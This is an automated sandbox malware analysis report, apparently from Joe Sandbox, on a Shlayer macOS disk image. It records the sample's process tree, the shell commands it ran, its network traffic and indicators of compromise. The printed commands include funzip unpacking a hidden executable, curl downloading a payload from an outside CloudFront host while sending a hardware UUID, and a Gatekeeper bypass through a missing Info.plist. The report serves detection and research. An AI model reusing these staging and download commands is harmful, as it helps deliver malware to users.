Play interactive tour

Edit tour

Analysis Report Shlayer.dmg

Overview

General Information

Sample Name:	Shlayer.dmg
Analysis ID:	1440084
MD5:	84d9f983d138141294a8ea6711cbc144
SHA1:	55869270ed20956e5c3e5533fb4472e4eb533dc2
SHA256:	70c6f9da05046525605e2066185929c2659e27a3851dc43d8aa69e2692e6154f
Infos:
Most interesting Screenshot:

Detection

Shlayer

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections)

Yara detected Shlayer

App bundle contains an uncommon file type as the main executable

App bundle contains hidden files/directories

Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection)

Terminates several processes with shell command 'killall'

Contains symbols with suspicious names likely related to encryption

Contains symbols with suspicious names likely related to networking

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Executes the "defaults" command used to read or modify user specific settings

Executes the "mktemp" command used to create a temporary unique file name

Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed

Executes the "system_profiler" command used to collect detailed system hardware and software information

Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)

Queries for attached disk images with shell command 'hdiutil'

Queries the macOS product version

Reads hardware related sysctl values

Reads the sysctl hardware model value (might be used for detecting VM presence)

Reads the systems hostname

Writes 64-bit Mach-O files to disk

Classification

Startup

System is mac-mojave

xpcproxy New Fork (PID: 965, Parent: 1)

1302 (MD5: 22531fba10b6359550cca00ab0be1d2c) Arguments: /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302 -psn_0_192559

bash New Fork (PID: 966, Parent: 965)

mktemp (MD5: 295fb8cee272a251f798cc4b1a713251) Arguments: mktemp -t Installer

bash New Fork (PID: 967, Parent: 965)

tail (MD5: 8da775e17235dcf5bbd46d1f016aab59) Arguments: tail -c 58853 /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302

bash New Fork (PID: 968, Parent: 965)

funzip (MD5: 87424b028867bea6560cc590720f84d7) Arguments: funzip -1uD9jgw

bash New Fork (PID: 969, Parent: 965)

bash New Fork (PID: 970, Parent: 969)

chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod +x /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS

bash New Fork (PID: 972, Parent: 969)

nohup (MD5: 05e181cb915d336de670a1fcad509435) Arguments: nohup /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS

Installer.q2a1KRHS (MD5: 1a06144fdbc2b7f4dab172bb89a36cef) Arguments: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS

sh New Fork (PID: 973, Parent: 972)

defaults (MD5: 36a61540ce99d6c9303a62405fea340f) Arguments: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

sh New Fork (PID: 974, Parent: 972)

sh New Fork (PID: 975, Parent: 974)

system_profiler (MD5: de1aa7b1e123ef5ba1b076a085bbcece) Arguments: system_profiler SPHardwareDataType

system_profiler New Fork (PID: 977, Parent: 975)

sh New Fork (PID: 976, Parent: 974)

awk (MD5: 434e28a3f230b6e0b1e8ff5637213759) Arguments: awk /UUID/ { print $3 }

sh New Fork (PID: 978, Parent: 972)

sh New Fork (PID: 979, Parent: 972)

sh New Fork (PID: 980, Parent: 979)

hdiutil (MD5: 6a08ca12fec7ff0315356432b8cfe31b) Arguments: hdiutil info -plist

sh New Fork (PID: 981, Parent: 979)

perl (MD5: af70985160b8e3f7b57fde159665e36c) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs

perl5.18 (MD5: 18ce3464a277a0f79a21935a03f1f9d5) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs

sh New Fork (PID: 982, Parent: 979)

plutil (MD5: 1c2f3fe5fdcbb3b7b386088f70a385c1) Arguments: plutil -convert json -r -o - -- -

sh New Fork (PID: 983, Parent: 972)

sh New Fork (PID: 984, Parent: 983)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1

sh New Fork (PID: 985, Parent: 972)

sh New Fork (PID: 986, Parent: 985)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1

sh New Fork (PID: 987, Parent: 972)

sh New Fork (PID: 988, Parent: 987)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1

sh New Fork (PID: 989, Parent: 972)

sh New Fork (PID: 990, Parent: 989)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1

bash New Fork (PID: 971, Parent: 965)

killall (MD5: ca9725d13691858b17d910f4a50ba04c) Arguments: killall Terminal

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
1302	JoeSecurity_Shlayer_2	Yara detected Shlayer	Joe Security

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: dropped file Installer.q2a1KRHS.297.dr

Mach-O symbol: _CCCrypt

Source: global traffic	HTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1 HTTP/1.1Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: /
Source: global traffic	HTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1 HTTP/1.1Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: /
Source: global traffic	HTTP traffic detected: GET /sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1 HTTP/1.0Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: /
Source: global traffic	HTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1 HTTP/1.1Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: /

Source: unknown

DNS traffic detected: queries for: d3vav6z7pfe066.cloudfront.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1245Connection: closeCache-Control: no-cache, no-storePragma: no-cacheExpires: -1Server: Microsoft-IIS/7.5Access-Control-Allow-Origin: *X-AspNet-Version: 4.0.30319p3p: CP="CAO PSA OUR"Date: Wed, 28 Apr 2021 08:02:06 GMTX-Cache: Error from cloudfrontVia: 1.1 4809763494a078a525dc1a2dff5ddf6c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA53-C1X-Amz-Cf-Id: EKb96V9Hg_WLxo8MSM04zh0ql32i-BswzYDBFD5T233DhhbXqrw05g==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 6

Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0

Source: classification engine

Classification label: mal72.troj.evad.macDMG@0/5@1/0

Source: dropped file Installer.q2a1KRHS.297.dr	Mach-O symbol: __ZTISt12domain_error
Source: dropped file Installer.q2a1KRHS.297.dr	Mach-O symbol: __ZTVSt12domain_error
Source: dropped file Installer.q2a1KRHS.297.dr	Mach-O symbol: __ZNSt12domain_errorD1Ev

Persistence and Installation Behavior:

Terminates several processes with shell command 'killall'

Show sources

Source: /bin/bash (PID: 971)

Killall command executed: killall Terminal

Jump to behavior

Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c system_profiler SPHardwareDataType \| awk '/UUID/ { print $3 }'	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c for FILE in /Volumes/Installer//.app do echo '${FILE}' break done	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c hdiutil info -plist \| perl -0777pe 's\|<data>\s(.?)\s*</data>\|<string>$1</string>\|gs' \| plutil -convert json -r -o - -- -	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1' > /dev/null 2>&1	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1' > /dev/null 2>&1	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 'http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1' > /dev/null 2>&1	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)	Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1' > /dev/null 2>&1	Jump to behavior

Source: /bin/bash (PID: 970)

Chmod executable: /bin/chmod -> chmod +x /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS

Jump to behavior

Source: /bin/sh (PID: 984)	Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1	Jump to behavior
Source: /bin/sh (PID: 986)	Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1	Jump to behavior
Source: /bin/sh (PID: 988)	Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1	Jump to behavior
Source: /bin/sh (PID: 990)	Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1	Jump to behavior

Source: /bin/bash (PID: 966)

Mktemp executable: /usr/bin/mktemp -> mktemp -t Installer

Jump to behavior

Source: /bin/bash (PID: 972)

Nohup executable: /usr/bin/nohup -> nohup /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS

Jump to behavior

Source: /bin/sh (PID: 973)	Shell process: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion	Jump to behavior
Source: /bin/sh (PID: 975)	Shell process: system_profiler SPHardwareDataType	Jump to behavior
Source: /bin/sh (PID: 976)	Shell process: awk /UUID/ { print $3 }	Jump to behavior
Source: /bin/sh (PID: 980)	Shell process: hdiutil info -plist	Jump to behavior
Source: /bin/sh (PID: 981)	Shell process: perl -0777pe s\|<data>\s(.?)\s*</data>\|<string>$1</string>\|gs	Jump to behavior
Source: /bin/sh (PID: 982)	Shell process: plutil -convert json -r -o - -- -	Jump to behavior
Source: /bin/sh (PID: 984)	Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1	Jump to behavior
Source: /bin/sh (PID: 986)	Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1	Jump to behavior
Source: /bin/sh (PID: 988)	Shell process: curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1	Jump to behavior
Source: /bin/sh (PID: 990)	Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1	Jump to behavior

Source: /bin/sh (PID: 980)

Hdiutil command executed: hdiutil info -plist

Jump to behavior

Source: /usr/bin/funzip (PID: 968)

File written: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS

Jump to dropped file

Source: /bin/sh (PID: 976)

Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }

Jump to behavior

Source: /usr/bin/perl5.18 (PID: 981)

Random device file read: /dev/urandom

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

App bundle contains an uncommon file type as the main executable

Show sources

Source: archive file from DMG submission

Uncommon file type "Bourne-Again shell script text executable": Installer/yWnBJLaF/1302.app/Contents/MacOS/1302

App bundle contains hidden files/directories

Show sources

Source: archive file from DMG submission

Hidden file : Installer/.nFO7evVxM9sjuU.png

Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection)

Show sources

Source: /bin/bash (PID: 968)

Funzip executable: /usr/bin/funzip -> funzip -1uD9jgw

Jump to behavior

Source: /usr/sbin/system_profiler (PID: 977)

Sysctl read request: hw.model (6.2)

Jump to behavior

Source: Installer.q2a1KRHS, 00000972.00000305.9.0000000102075000.000000010207b000.r--.sdmp	Binary or memory string: framework.vmnet
Source: Installer.q2a1KRHS, 00000972.00000305.9.0000000102075000.000000010207b000.r--.sdmp	Binary or memory string: framework.vmnet$

HIPS / PFW / Operating System Protection Evasion:

Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections)

Show sources

Source: submission archive DMG

Script file without a corresponding application bundle Info.plist: Installer/yWnBJLaF/1302.app/Contents/MacOS/1302

Source: /bin/sh (PID: 973)

Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Jump to behavior

Source: /usr/sbin/system_profiler (PID: 977)	Sysctl read request: hw.cpu_freq (6.15)			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 977)	Sysctl read request: hw.memsize (6.24)			Jump to behavior

Source: /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302 (PID: 965)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 973)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 974)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 978)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 979)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 983)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 985)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 987)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 989)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Source: /bin/sh (PID: 973)

Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Jump to behavior

Stealing of Sensitive Information:

Yara detected Shlayer

Show sources

Source: Yara match

File source: 1302, type: SAMPLE

Source: /bin/sh (PID: 975)	System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 975)	System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full			Jump to behavior

Remote Access Functionality:

Yara detected Shlayer

Show sources

Source: Yara match

File source: 1302, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Path Interception	Path Interception	Masquerading2	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Data Encrypted1	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Hide Artifacts1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Alternative Protocol1	Non-Application Layer Protocol3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	System Information Discovery6	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File and Directory Permissions Modification1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories2	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Gatekeeper Bypass1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
d3vav6z7pfe066.cloudfront.net	143.204.214.77	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1	false	high
http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1	false	high
http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1	false	high
http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
143.204.214.77	d3vav6z7pfe066.cloudfront.net	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox Version:
Analysis ID:	1440084
Start date:	28.04.2021
Start time:	10:01:12
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Shlayer.dmg
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Run name:	Potential for more IOCs and behavior
Analysis Mode:	default
Detection:	MAL
Classification:	mal72.troj.evad.macDMG@0/5@1/0

Runtime Messages

Command:	open "/Volumes/Installer/yWnBJLaF/1302.app" --args
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Created / dropped Files

/dev/null Download File
Process:	/usr/bin/curl
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	317
Entropy (8bit):	2.970193051337526
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeX/8UniGdCSgOgcdSgOgc3:Vz6ykymUe0bSc9cL9c3
MD5:	E366B41BAD194FDD726766F35E91D09D
SHA1:	2218BB471D77EBB109695D13746E68460DC130B7
SHA-256:	2232B309AD0BAA2A3EFEE3BC034A8BD56E4A8754538030F43FC9D2657E77981A
SHA-512:	CD56F02CE9C0F66A33B8AE23BA3B0F2A3D784EB20FD504762FE30E9E3D1BC6937187F380569F6559549DAE750CF0166AD85080EAF6566BBE34070E1CC834C92A
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed.. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.

/private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS Download File
Process:	/usr/bin/funzip
File Type:	Mach-O 64-bit executable
Category:	dropped
Size (bytes):	172772
Entropy (8bit):	5.8977653526850125
Encrypted:	false
SSDEEP:	3072:bHyFmArSM6KPbUG/TzEIv09FGGzQxeGMZJkNpO6JgIrbMujky:rtYSjKzHOFgQa/bMujky
MD5:	1A06144FDBC2B7F4DAB172BB89A36CEF
SHA1:	20AC95C44549710A434902267394525333E96C0B
SHA-256:	DE236DEBD4740103BA74618B77BFFA88A8409842894906FF884632790652DE57
SHA-512:	3C092BC3CDAD5AED0CE9B4CE7A3456C02DCDA294D3E37B87DC588FB639B8A975A81B7FFD791CDF75418A6AE9681B8E0DF17F202328BF96AF5AD444E2034DD260
Malicious:	false
Reputation:	low
Preview:	..........................!.........H...__PAGEZERO..........................................................x...__TEXT...................P...............P......................__text..........__TEXT..........0.......H.......0...............................__stubs.........__TEXT..........x.......^.......x...............................__stub_helper...__TEXT..........................................................__gcc_except_tab__TEXT...........#...............#..............................__cstring.......__TEXT.........../......p......../..............................__const.........__TEXT...........6...............6..............................__unwind_info...__TEXT...........@...............@......................................__DATA...........P...............P..............................__nl_symbol_ptr.__DATA...........P...............P..................e...........__got...........__DATA...........P...............P..................g...........__la_symbol_ptr.__DATA..........

Static File Info

General
File type:	data
Entropy (8bit):	7.977799371599045
TrID:	Disk Image (Macintosh), zlib, GPT (10001/1) 66.65% Pixlr layered image (2002/1) 13.34% Pivot stickfigure animation (2002/1) 13.34% XMill compressed XML (1001/1) 6.67%
File name:	Shlayer.dmg
File size:	360707
MD5:	84d9f983d138141294a8ea6711cbc144
SHA1:	55869270ed20956e5c3e5533fb4472e4eb533dc2
SHA256:	70c6f9da05046525605e2066185929c2659e27a3851dc43d8aa69e2692e6154f
SHA512:	0c01c37f0f8626f458cfd524542ec5c240bda7684c28e0519f3af32444358e80b0ddad399dcdbd93666e810d60b2a311f999deba4a923897d36536dd8b71cf3d
SSDEEP:	6144:DSs9bLowD2RsLDXLHqMtI5dcCQVbj5kuYlP6+l6Jj6HLZyR1d8wyhdve0XbbAs6m:D3j2GLiGCQVKJ8K2jILGCdGAfV6hbcv
